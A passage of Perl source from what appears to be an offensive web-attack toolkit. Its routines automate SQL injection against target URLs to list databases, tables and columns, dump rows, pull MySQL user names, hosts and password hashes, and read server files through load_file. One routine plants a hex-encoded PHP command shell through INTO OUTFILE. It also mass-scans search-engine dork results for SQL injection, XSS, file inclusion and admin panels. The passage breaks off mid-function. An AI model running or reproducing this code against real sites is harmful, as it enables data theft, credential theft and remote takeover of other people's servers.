1259. printear("\n[+] Searching tables with schema\n\n","text","13","5");
1260. $page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
1261. $page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
1262. $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass2);
1263. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
1264. my $resto = $1;
1265. $total = $resto - 17;
1266. printear("[+] Tables Length :  $total\n\n","text","13","5");
1267. savefilear($save.".txt","[+] Searching tables with schema\n");
1268. savefilear($save.".txt","[+] Tables Length :  $total\n");
1269. my $limit = $1;
1270. for my $limit(17..$limit) {
1271. $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."limit".$pass1.$limit.",1".$pass2);
1272. #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."limit".$pass1.$limit.",1".$pass2."\n";
1273. if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
1274. my $table = $1;
1275. chomp $table;
1276. printear("[Table $real Found : $table ]\n","text","7","5");
1277. savefilear($save.".txt","[Table $real Found : $table ]");
1278. $real++;
1279. }}
1280. } else {
1281. printear("\n[-] information_schema = ERROR\n","text","5","5");
1282. }    
1283. }
1284. sub reload {
1285. printear("\n\n[+] Finish\n\n","text","11","5");
1286. <STDIN>;
1287. &head_kobra;
1288. &menu_options;
1289. }
1290.  
1291. sub schemacolumns {
1292. my ($page,$bypass,$save,$table) = @_;
1293. my $page3 = $page;
1294. my $page4 = $page;
1295. savefilear($save.".txt","\n");
1296. print "\n";
1297. ($pass1,$pass2) = &bypass($bypass);
1298. printear("\n[DB] : default\n","text","13","5");
1299. savefilear($save.".txt","[DB] : default");
1300. savefilear($save.".txt","[Table] : $table\n");
1301. $page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
1302. $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass2);
1303. if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
1304. printear("\n[Columns Length : $1 ]\n\n","text","13","5");
1305. savefilear($save.".txt","[Columns Length : $1 ]\n");
1306. my $si = $1;
1307. chomp $si;
1308. $page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
1309. $real = "1";
1310. for my $limit2(0..$si) {
1311. $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
1312. if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
1313. printear("[Column $real] : $1\n","text","7","5");
1314. savefilear($save.".txt","[Column $real] : $1");
1315. $real++;
1316. }}
1317. } else {
1318. printear("\n[-] information_schema = ERROR\n","text","5","5");
1319. }}
1320.  
1321. sub schemadb {
1322. my ($page,$bypass,$save) = @_;
1323. my $page1 = $page;
1324. savefilear($save.".txt","\n");
1325. printear("\n\n[+] Searching DBS\n\n","text","13","5");
1326. ($pass1,$pass2) = &bypass($bypass);
1327. $page=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
1328. $code = toma($page.$pass1."from".$pass1."information_schema.schemata");
1329. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
1330. my $limita = $1;
1331. printear("[+] Databases Length : $limita\n\n","text","13","5");
1332. savefilear($save.".txt","[+] Databases Length : $limita\n");
1333. $page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),schema_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
1334. $real = "1";
1335. for my $limit(0..$limita) {
1336. $code = toma($page1.$pass1."from".$pass1."information_schema.schemata".$pass1."limit".$pass1.$limit.",1".$pass2);
1337. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
1338. my $control = $1;
1339. if ($control ne "information_schema" and $control ne "mysql" and $control ne "phpmyadmin") {
1340. printear("[Database $real Found] $control\n","text","7","5");
1341. savefilear($save.".txt","[Database $real Found] : $control");
1342. $real++;
1343. }
1344. }
1345. }
1346. } else {
1347. printear("\n[-] information_schema = ERROR\n","text","5","5");
1348. }
1349. }
1350.  
1351. sub schematablesdb {
1352. my $page = $_[0];
1353. my $db = $_[2];
1354. my $page1 = $page;
1355. savefilear($_[3].".txt","\n");
1356. printear("\n\n[+] Searching tables with DB $db\n\n","text","13","5");
1357. ($pass1,$pass2) = &bypass($_[1]);
1358. savefilear($_[3].".txt","[DB] : $db");
1359. $page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
1360. $page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
1361. $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2);
1362. #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n";
1363. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {  
1364. printear("[+] Tables Length :  $1\n\n","text","13","5");
1365. savefilear($_[3].".txt","[+] Tables Length :  $1\n");
1366. my $limit = $1;
1367. $real = "1";
1368. for my $lim(0..$limit) {
1369. $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2);
1370. #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n";
1371. if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
1372. my $table = $1;
1373. chomp $table;
1374. savefilear($_[3].".txt","[Table $real Found : $table ]");
1375. printear("[Table $real Found : $table ]\n","text","7","5");
1376. $real++;
1377. }}
1378. } else {
1379. printear("\n[-] information_schema = ERROR\n","text","5","5");
1380. }}
1381.  
1382. sub schemacolumnsdb {
1383. my ($page,$bypass,$db,$table,$save) = @_;
1384. my $page3 = $page;
1385. my $page4 = $page;
1386. printear("\n\n[+] Searching columns in table $table with DB $db\n\n","text","13","5");
1387. savefilear($save.".txt","\n");
1388. ($pass1,$pass2) = &bypass($_[1]);
1389. savefilear($save.".txt","\n[DB] : $db");
1390. savefilear($save.".txt","[Table] : $table");
1391. $page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
1392. $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass2);
1393. if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
1394. printear("\n[Columns length : $1 ]\n\n","text","13","5");
1395. savefilear($save.".txt","[Columns length : $1 ]\n");
1396. my $si = $1;
1397. chomp $si;
1398. $page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
1399. $real = "1";
1400. for my $limit2(0..$si) {
1401. $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
1402. if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
1403. printear("[Column $real] : $1\n","text","7","5");
1404. savefilear($save.".txt","[Column $real] : $1");
1405. $real++;
1406. }
1407. }
1408. } else {
1409. printear("\n[-] information_schema = ERROR\n","text","5","5");
1410. }
1411. }
1412.  
1413. sub mysqluser {
1414. my ($page,$bypass,$save) = @_;
1415. my $cop = $page;
1416. my $cop1 = $page;
1417. savefilear($save.".txt","\n");
1418. printear("\n\n[+] Finding mysql.users\n","text","13","5");
1419. ($pass1,$pass2) = &bypass($bypass);
1420. $page =~s/hackman/concat(char(82,65,84,83,88,80,68,79,87,78,49))/;
1421. $code = toma($page.$pass1."from".$pass1."mysql.user".$pass2);
1422. if ($code=~/RATSXPDOWN/ig){
1423. $cop1 =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
1424. $code1 = toma($cop1.$pass1."from".$pass1."mysql.user".$pass2);
1425. if ($code1=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
1426. printear("\n[+] Users Found : $1\n\n","text","13","5");;
1427. savefilear($save.".txt","\n[+] Users mysql Found : $1\n");
1428. for my $limit(0..$1) {
1429. $cop =~s/hackman/unhex(hex(concat(0x524154535850444f574e,Host,0x524154535850444f574e,User,0x524154535850444f574e,Password,0x524154535850444f574e)))/;
1430. $code = toma($cop.$pass1."from".$pass1."mysql.user".$pass1."limit".$pass1.$limit.",1".$pass2);
1431. if ($code=~/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig) {
1432. printear("[Host] : $1 [User] : $2 [Password] : $3\n","text","7","5");
1433. savefilear($save.".txt","[Host] : $1 [User] : $2 [Password] : $3");
1434. } else {
1435. &reload;
1436. }
1437. }
1438. }
1439. } else {
1440. printear("\n[-] mysql.user = ERROR\n","text","5","5");
1441. }
1442. }
1443.  
1444. sub fuzz {
1445. my $page = $_[0];
1446. ($pass1,$pass2) = &bypass($_[1]);
1447. my $count = "0";
1448. savefilear($_[2].".txt","\n");
1449. print "\n";
1450. if ($_[0] =~/(.*)hackman(.*)/g) {
1451. my $start = $1; my $end = $2;
1452. printear("\n[+] Searching tables.....\n\n","text","13","5");
1453. for my $table(@buscar2) {
1454. chomp $table;
1455. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))";
1456. $injection = $start.$concat.$end.$pass1."from".$pass1.$table.$pass2;
1457. $code = toma($injection);
1458. if ($code =~/ERTOR854/g) {
1459. $count++;
1460. printear("[Table Found] : $table\n","text","7","5");
1461. savefilear($_[2].".txt","[Table Found] : $table");
1462. }}}
1463. if ($count eq "0") {
1464. printear("[-] Not found any table\n","text","5","5");
1465. &reload;
1466. }
1467. }
1468.  
1469. sub fuzzcol {
1470. my $page = $_[0];
1471. ($pass1,$pass2) = &bypass($_[1]);
1472. my $count = "0";savefilear($_[3].".txt","\n");
1473. print "\n";
1474. if ($_[0] =~/(.*)hackman(.*)/) {
1475. my $start = $1; my $end = $2;
1476. printear("\n[+] Searching columns for the table $_[2]...\n\n\n","text","13","5");
1477. savefilear($_[3].".txt","[Table] : $_[2]");
1478. for my $columns(@buscar1) {
1479. chomp $columns;
1480. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$columns,char(69,82,84,79,82,56,53,52))))";
1481. $code = toma($start.$concat.$end.$pass1."from".$pass1.$_[2].$pass2);
1482. if ($code =~/ERTOR854/g) {
1483. printear("[Column Found] : $columns\n","text","7","5");
1484. savefilear($_[3].".txt","[Column Found] : $columns");
1485. }
1486. }
1487. }
1488. if ($count eq "0") {
1489. printear("[-] Not found any column\n","text","5","5");
1490. &reload;
1491. }
1492. }
1493.  
1494. sub load {
1495. savefilear($_[2].".txt","\n");
1496. print "\n";
1497. ($pass1,$pass2) = &bypass($_[1]);
1498. if ($_[0] =~/(.*)hackman(.*)/g) {
1499. printear("\n[+] Searching files with load_file...\n\n\n","text","13","5");
1500. my $start = $1; my $end = $2;
1501. for my $file(@files) {
1502. chomp $file;
1503. $concat = "unhex(hex(concat(char(107,48,98,114,97),load_file(".encode($file)."),char(107,48,98,114,97))))";
1504. my $code = toma($start.$concat.$end.$pass2);
1505. chomp $code;
1506. if ($code=~/k0bra(.*)k0bra/s) {
1507. printear("[File Found] : $file\n","text","11","5");
1508. printear("\n[Source Start]\n\n","text","7","5");
1509. printear("$1","text","7","5");
1510. printear("\n\n[Source End]\n\n","text","7","5");
1511. savefilear($_[2].".txt","[File Found] : $file");
1512. savefilear($_[2].".txt","\n[Source Start]\n");
1513. savefilear($_[2].".txt","$1");
1514. savefilear($_[2].".txt","\n[Source End]\n");
1515. }}}}
1516.  
1517. sub loadfile {
1518. savefilear($_[2].".txt","\n");
1519. ($pass1,$pass2) = &bypass($_[1]);
1520. if ($_[0] =~/(.*)hackman(.*)/g) {
1521. my $start = $1; my $end = $2;
1522. my $file  = printear("\n\n[+] File to read : ","stdin","11","13");
1523. $concat = "unhex(hex(concat(char(107,48,98,114,97),load_file(".encode($file)."),char(107,48,98,114,97))))";
1524. my $code = toma($start.$concat.$end.$pass2);
1525. chomp $code;
1526. if ($code=~/k0bra(.*)k0bra/s) {
1527. printear("\n[File Found] : $file\n","text","11","5");
1528. printear("\n[Source Start]\n\n","text","7","5");
1529. printear("$1","text","7","5");
1530. printear("\n\n[Source End]\n\n","text","7","5");
1531. savefilear($_[2].".txt","[File Found] : $file");
1532. savefilear($_[2].".txt","\n[Source Start]\n");
1533. savefilear($_[2].".txt","$1");
1534. savefilear($_[2].".txt","\n[Source End]\n");
1535. }}}
1536.  
1537. sub dump {
1538. savefilear($_[5].".txt","\n");
1539. my $page = $_[0];
1540. ($pass1,$pass2) = &bypass($_[4]);
1541. if ($page=~/(.*)hackman(.*)/){
1542. my $start = $1;
1543. my $end = $2;
1544. printear("[+] Extracting values...\n\n","text","13","5");
1545. $concatx = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($_[1]),char(69,82,84,79,82,56,53,52))))";
1546. $val_code = toma($start.$concatx.$end.$pass1."from".$pass1.$_[3].$pass2);
1547. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$_[1],char(69,82,84,79,82,56,53,52),$_[2],char(69,82,84,79,82,56,53,52))))";
1548. if ($val_code=~/ERTOR854(.*)ERTOR854/ig) {
1549. $tota = $1;
1550. printear("[+] Length of the rows : $tota\n\n","text","13","5");
1551. printear("[+] Extracting values...\n\n","text","13","5");
1552. printear("[$_[1]] [$_[2]]\n\n","text","13","5");
1553. savefilear($_[5].".txt","[Table] : $_[3]");
1554. savefilear($_[5].".txt","[+] Length of the rows: $tota\n");
1555. savefilear($_[5].".txt","[$_[1]] [$_[2]]\n");
1556. for my $limit(0..$tota) {
1557. chomp $limit;
1558. $injection = toma($start.$concat.$end.$pass1."from".$pass1.$_[3].$pass1."limit".$pass1.$limit.",1".$pass2);
1559. if ($injection=~/ERTOR854(.*)ERTOR854(.*)ERTOR854/ig) {
1560. savefilear($_[5].".txt","[$_[1]] : $1   [$_[2]] : $2");
1561. printear("[$_[1]] : $1   [$_[2]] : $2\n","text","7","5");
1562. } else {
1563. printear("\n\n[+] Extracting Finish\n","text","13","5");
1564. &reload;
1565. }
1566. }
1567. } else {
1568. printear("[-] Not Found any DATA\n\n","text","5","5");
1569. }}}
1570.  
1571.  
1572. sub into {
1573. printear("\n\n[Status] : Injecting a SQLI for create a shell\n","text","13","5");
1574. my ($page,$bypass,$dir,$save) = @_;
1575. savefilear($save.".txt","\n");
1576. print "\n";
1577. ($pass1,$pass2) = &bypass($bypass);
1578. my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
1579. if ($path=~/\/(.*)$/) {    
1580. my $path1 = $1;
1581. my $path2 = $path1;
1582. $path2 =~s/$1//;
1583. $dir =~s/$path1//ig;
1584. $shell = $dir."/"."shell.php";
1585. if ($page =~/(.*)hackman(.*)/ig) {
1586. my  ($start,$end) = ($1,$2);
1587. $code = toma($start."0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e".$end.$pass1."into".$pass1."outfile".$pass1."'".$shell."'".$pass2);
1588. $code1 = toma("http://".$auth."/".$path2."/"."shell.php");
1589. if ($code1=~/Mini Shell By Doddy/ig) {
1590. printear("[Shell Up] : http://".$auth."/".$path2."/"."shell.php"."\a\a","text","7","5");
1591. savefilear($save.".txt","[shell up] : http://".$auth."/".$path2."/"."shell.php");
1592. } else {
1593. printear("[Shell] : Not Found","text","5","5");
1594. }
1595. }
1596. }
1597. }
1598.  
1599. } ##
1600.  
1601. sub load_paranoic_old {
1602.  
1603. installer_par();
1604. staq();
1605.  
1606. sub staq {
1607. sub head_scan {
1608. clean();
1609. printear("
1610.  
1611.  
1612.  @@@    @@@@    @    @    @  @    @  @@@@@  @@@@@
1613. @   @  @    @   @    @@   @  @@   @  @      @    @
1614. @      @       @ @   @@   @  @@   @  @      @    @
1615. @      @       @ @   @ @  @  @ @  @  @      @    @
1616.  @@@   @      @   @  @ @  @  @ @  @  @@@@   @@@@@
1617.     @  @      @   @  @  @ @  @  @ @  @      @    @
1618.     @  @      @@@@@  @   @@  @   @@  @      @    @
1619. @   @  @    @@     @ @   @@  @   @@  @      @    @
1620.  @@@    @@@@ @     @ @    @  @    @  @@@@@  @    @
1621.  
1622.  
1623.  
1624.  
1625. ","text","7","5");
1626. }
1627.  
1628. &menu_sca;
1629.  
1630. sub menu_sca {
1631. &head_scan;
1632. printear("[a] : Scan a File\n","text","13","5");
1633. printear("[b] : Search in Google and scan the webs\n","text","13","5");
1634. printear("[c] : Search in Bing and scan the webs\n\n","text","13","5");
1635. my $op  = printear("[option] : ","stdin","11","13");
1636.  
1637. scan($op);
1638.  
1639. }
1640.  
1641. sub scan {
1642.  
1643. my $count;
1644. my $option;
1645. my $op = shift;
1646. my @paginas;
1647.  
1648. if ($op =~/a/ig) {
1649.  
1650. my $word  = printear("\n[+] Wordlist : ","stdin","11","13");
1651.  
1652. @paginas = repes(cortar(savewords($word)));
1653.  
1654. $option = &men;
1655.  
1656. if($option=~/Q/ig) {
1657. $count  = printear("\n[+] Panels Count : ","stdin","11","13");
1658. }
1659.  
1660. }
1661.  
1662. elsif ($op=~/b/ig) {
1663.  
1664. my $dork  = printear("\n[+] Dork : ","stdin","11","13");
1665. my $pag  = printear("\n[+] Pages : ","stdin","11","13");
1666. $option = &men;
1667.  
1668. if($option=~/Q/ig) {
1669. $count  = printear("\n[+] Panels Count : ","stdin","11","13");
1670. }
1671.  
1672. printear("\n\n[+] Searching in Google\n","text","13","5");
1673.  
1674. @paginas = &google($dork,$pag);
1675.  
1676. }
1677.  
1678. elsif ($op=~/c/ig) {
1679. my $dork  = printear("\n[+] Dork : ","stdin","11","13");
1680. my $pag  = printear("\n[+] Pages : ","stdin","11","13");
1681. $option = &men;
1682.  
1683. if($option=~/Q/ig) {
1684. $count  = printear("\n[+] Panels Count : ","stdin","11","13");
1685. }
1686.  
1687. printear("\n\n[+] Searching in Bing\n","text","13","5");
1688.  
1689. @paginas = &bing($dork,$pag);  
1690.  
1691. }
1692.  
1693. else {
1694. &finish_now;
1695. }
1696.  
1697. printear("\n\n[Status] : Scanning\n","text","7","5");
1698. printear("[Webs Count] : ".int(@paginas)."\n\n","text","7","5");
1699. for(@paginas) {
1700. if ($option=~/S/ig) {
1701. scansql($_);
1702. }
1703. if ($option=~/K/ig) {
1704. sql($_);
1705. }
1706. if ($option=~/Q/ig) {
1707. sqladmin($_,$count);
1708. }
1709. if ($option=~/Y/ig) {
1710. simple($_);
1711. }
1712. if ($option=~/L/ig) {
1713. lfi($_);
1714. }
1715. if ($option=~/R/ig) {
1716. rfi($_);
1717. }
1718. if ($option=~/F/ig) {
1719. fsd($_);
1720. }
1721. if ($option=~/X/ig) {
1722. scanxss($_);
1723. }
1724. if ($option=~/M/ig) {
1725. mssql($_);
1726. }
1727. if ($option=~/J/ig) {
1728. access($_);
1729. }
1730. if ($option=~/O/ig) {
1731. oracle($_);
1732. }
1733. if ($option=~/HT/ig) {
1734. http($_);
1735. }
1736. if ($option=~/A/ig) {
1737. scansql($_);
1738. scanxss($_);
1739. mssql($_);
1740. access($_);
1741. oracle($_);
1742. lfi($_);
1743. rfi($_);
1744. fsd($_);
1745. http($_);
1746. }
1747. }
1748. }
1749. printear("\n\n[Status] : Finish\n","text","13","5");
1750. &finish_now;
1751. }
1752.      
1753. sub sql {
1754. my ($pass1,$pass2) = ("+","--");
1755. my $page = shift;
1756. $code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
1757. if ($code1=~/The used SELECT statements have a different number of columns/ig) {
1758. printear("[+] SQLI : $page\a\n","text","11","5");
1759. savefile("sql-logs.txt",$page);
1760. }}
1761.  
1762. sub sqladmin {
1763.  
1764. my ($pass1,$pass2) = ("+","--");
1765.  
1766. my $page = $_[0];
1767. my $limite = $_[1];
1768.  
1769. if($limite eq "") {
1770. $limite = 3;
1771. }
1772.  
1773. $code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
1774. if ($code1=~/The used SELECT statements have a different number of columns/ig) {
1775. printear("\n[+] SQLI : $page\a\n","text","11","5");
1776. savefile("sql-logs.txt",$page);
1777.  
1778. my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
1779.  
1780. my $fage = "http://".$auth;
1781.  
1782. my $count = 0;
1783.  
1784. for my $path(@paneles) {
1785.  
1786. if($count eq $limite) {
1787. last;
1788. }
1789.  
1790. $code = tomados($fage."/".$path);
1791.  
1792. if ($code->is_success) {
1793. $controlt = 1;
1794. $count++;
1795. printear("[+] Link : ".$fage."/".$path."\n","text","11","5");
1796. savefile("admin-logs.txt",$fage."/".$path);
1797. }
1798. }
1799. }
1800.  
1801. }
1802.  
1803. sub http {
1804.  
1805. my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
1806.  
1807. my $socket = IO::Socket::INET->new(
1808. PeerAddr=>$auth,
1809. PeerPort=>"80",
1810. Proto=>"tcp");
1811.  
1812. print $socket "OPTIONS  / HTTP/1.0\r\n\r\n";
1813. read $socket,$resultado,"1000";
1814.  
1815. if ($resultado=~/Server:(.*)/g) {
1816. my $server = $1;
1817.  
1818. printear("\n[+] Page : $auth"."\n","text","11","5");
1819. printear("[+] Server : ".$server."\n","text","11","5");
1820.  
1821. savefile("http-logs.txt","[+] Page : $auth"."\n");
1822. savefile("http-logs.txt","[+] Server : ".$server."\n");
1823. }
1824. if ($resultado=~/Allow: (.*)/g) {
1825. my $options = $1;
1826.  
1827. printear("[+] Options : ".$options."\n","text","11","5");
1828. savefile("http-logs.txt","[+] Options : ".$options."\n");
1829.  
1830. }
1831. $socket->close;
1832. }
1833.  
1834. sub scanxss {
1835.  
1836. my $page = shift;
1837. chomp $page;
1838.  
1839. my @testar = HTML::Form->parse(toma($page),"/");
1840. my @botones_names;
1841. my @botones_values;
1842. my @orden;
1843. my @pa = ("<script>alert(String.fromCharCode(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111))</script>",'"><script>alert(String.fromCharCode(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111))</script>');
1844. my @get_founds;
1845. my @post_founds;
1846. my @ordenuno;
1847. my @ordendos;
1848.  
1849. my $contador_forms = 0;
1850.  
1851. my $valor = "doddyhackman";
1852.  
1853. for my $test(@testar) {
1854. $contador_forms++;
1855. if ($test->method eq "POST") {
1856. my @inputs = $test->inputs;
1857. for my $in(@inputs) {
1858. if ($in->type eq "submit") {
1859. if ($in->name eq "") {
1860. push(@botones_names,"submit");
1861. }
1862. push(@botones_names,$in->name);
1863. push(@botones_values,$in->value);
1864. } else {
1865. push(@ordenuno,$in->name,$pa[0]);
1866. push(@ordendos,$in->name,$pa[1]);
1867. }}
1868.  
1869. for my $n(0..int(@botones_names)-1) {
1870. my @preuno = @ordenuno;
1871. my @predos = @ordendos;
1872. push(@preuno,$botones_names[$n],$botones_values[$n]);
1873. push(@predos,$botones_names[$n],$botones_values[$n]);
1874.  
1875. my $codeuno = $nave->post($page,\@preuno)->content;
1876. my $codedos = $nave->post($page,\@predos)->content;
1877. if ($codeuno=~/<script>alert\(String.fromCharCode\(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111\)\)<\/script>/ig or
1878. $codedos=~/<script>alert\(String.fromCharCode\(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111\)\)<\/script>/ig) {
1879. if ($test->attr(name) eq "" or $test->attr(name) eq " ") {
1880. push(@post_founds,$contador_forms);
1881. } else {
1882. push(@post_founds,$test->attr(name));
1883. }}}
1884. } else { #Fin de metodo POST
1885. my @inputs = $test->inputs;
1886. for my $in(@inputs) {  
1887. if ($in->type eq "submit") {
1888. if ($in->name eq "") {
1889. push(@botones_names,"submit");
1890. }
1891. push(@botones_names,$in->name);
1892. push(@botones_values,$in->value);
1893. } else {
1894. $orden.=''.$in->name.'='.$valor.'&';
1895. }}
1896. chop($orden);
1897. for my $n(0..int(@botones_names)-1) {
1898. my $partedos = "&".$botones_names[$n]."=".$botones_values[$n];
1899. my $final = $orden.$partedos;
1900. for my $strin(@pa) {
1901. chomp $strin;
1902. $final=~s/doddyhackman/$strin/;
1903. $code = toma($page."?".$final);
1904. my $strin = "\Q$strin\E";
1905. if ($code=~/$strin/) {
1906. push(@get_founds,$page."?".$final);
1907. }}}}}
1908.  
1909. my @get_founds = repes(@get_founds);
1910. if (int(@get_founds) ne 0) {
1911. for(@get_founds) {
1912. savefile("xss-logs.txt","[+] XSS Found : $_");
1913. printear("[+] XSS Found : $_\n\a","text","11","5");
1914. }}
1915.  
1916. my @post_founds = repes(@post_founds);
1917. if (int(@post_founds) ne 0) {
1918. for my $t(@post_founds) {
1919. if ($t =~/^\d+$/) {
1920. savefile("xss-logs.txt","[+] XSS : Form $t in $page");
1921. printear("[+] XSS : Form $t in $page\n\a","text","11","5");
1922. }}}}
1923.  
1924.  
1925. sub simple {
1926.  
1927. my $code  = toma($_[0]);
1928. my @links = get_links($code);
1929.  
1930. for my $com (@links) {
1931. my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] );
1932. if ( $path =~ /\/(.*)$/ ) {
1933. my $path1 = $1;
1934. $_[0] =~ s/$path1//ig;
1935. my ( $scheme, $auth, $path, $query, $frag ) = uri_split($com);
1936. if ( $path =~ /(.*)\// ) {
1937. my $parche = $1;                                
1938. unless($repetidos=~/$parche/){
1939. $repetidos.=" ".$parche;
1940. my $code=toma("http://".$auth.$parche);    
1941. if ($code =~ /Index of (.*)</ig ) {
1942. my $dir_found = $1;
1943. chomp $dir_found;
1944. printear("[+] Directory Found : "."http://".$auth.$parche."\n","text","11","5");
1945. savefile("dir-logs.txt","[+] Directory Found : "."http://".$auth.$parche);
1946. }}}}}}
1947.  
1948. sub scansql {
1949.  
1950. my $page = shift;
1951. my $copia = $page;
1952.  
1953. $co = toma($page."'");
1954.  
1955. if ($co=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $co=~ /mysql_free_result/ig || $co =~ /mysql_fetch_assoc/ig ||$co =~ /mysql_num_rows/ig || $co =~ /mysql_fetch_array/ig || $co =~/mysql_fetch_assoc/ig || $co=~/mysql_query/ig || $co=~/mysql_free_result/ig || $co=~/equivocado en su sintax/ig || $co=~/You have an error in your SQL syntax/ig || $co=~/Call to undefined function/ig) {
1956. savefile("sql-logs.txt","[+] SQL : $page");
1957. printear("[+] SQLI : $page\a\n","text","11","5");
1958. } else {
1959.  
1960. if ($page=~/(.*)\?(.*)/) {
1961. my $page = $1;
1962.  
1963. my @testar = HTML::Form->parse(toma($page),"/");
1964. my @botones_names;
1965. my @botones_values;
1966. my @orden;
1967. my @get_founds;
1968. my @post_founds;
1969. my @ordenuno;
1970. my @ordendos;
1971.  
1972. my $contador_forms = 0;
1973.  
1974. my $valor = "doddyhackman";
1975.  
1976. for my $test(@testar) {
1977. $contador_forms++;
1978. if ($test->method eq "POST") {
1979. my @inputs = $test->inputs;
1980. for my $in(@inputs) {
1981. if ($in->type eq "submit") {
1982. if ($in->name eq "") {
1983. push(@botones_names,"submit");
1984. }
1985. push(@botones_names,$in->name);
1986. push(@botones_values,$in->value);
1987. } else {
1988. push(@ordenuno,$in->name,"'");
1989. }}
1990.  
1991. for my $n(0..int(@botones_names)-1) {
1992. my @preuno = @ordenuno;
1993. push(@preuno,$botones_names[$n],$botones_values[$n]);
1994. my $code = $nave->post($page,\@preuno)->content;
1995. if ($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/Call to undefined function/ig) {
1996. if ($test->attr(name) eq "" or $test->attr(name) eq " ") {
1997. push(@post_founds,$contador_forms);
1998. } else {
1999. push(@post_founds,$test->attr(name));
2000. }}}}
2001.  
2002. my @post_founds = repes(@post_founds);
2003. if (int(@post_founds) ne 0) {
2004. for my $t(@post_founds) {
2005. if ($t =~/^\d+$/) {
2006. savefile("sql-logs.txt","[+] SQLI : Form $t in $page");
2007. printear("[+] SQLI : Form $t in $page\n\a","text","11","5");
2008. }}}}}}}
2009.  
2010. sub access {
2011.  
2012. my $page = shift;
2013. $code1 = toma($page."'");
